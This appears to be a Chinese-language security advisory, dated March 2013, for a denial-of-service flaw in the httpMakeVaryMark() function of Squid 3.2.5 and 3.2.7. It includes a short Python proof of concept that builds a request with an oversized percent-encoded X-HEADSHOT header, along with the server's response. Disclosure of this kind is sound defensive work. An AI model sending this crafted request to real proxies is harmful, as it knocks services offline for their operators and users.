发布日期:2013-03-05
更新日期:2013-03-07
受影响系统:
Squid Squid 3.2.7
Squid Squid 3.2.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58319
Squid是一个高效的Web缓存及代理程序。
Squid 3.2.5、3.2.7在函数'httpMakeVaryMark()'的实现上存在安全漏洞,成功利用后可允许远程攻击者造成Squid内存异常,触发拒绝服务。
<*来源:tytusromekiatomek (tytusromekiatomek@hushmail.com)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
tytusromekiatomek (tytusromekiatomek@hushmail.com)提供了如下测试方法:
Request
-- cut --
#!/usr/bin/env python
print 'GET /index.html HTTP/1.1'
print 'Host: localhost'
print 'X-HEADSHOT: ' + '%XX' * 19000
print '\r\n\r\n'
-- cut --
Response
-- cut --
HTTP/1.1 200 OK
Vary: X-HEADSHOT
-- cut --
建议:
--------------------------------------------------------------------------------
厂商补丁:
Squid
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: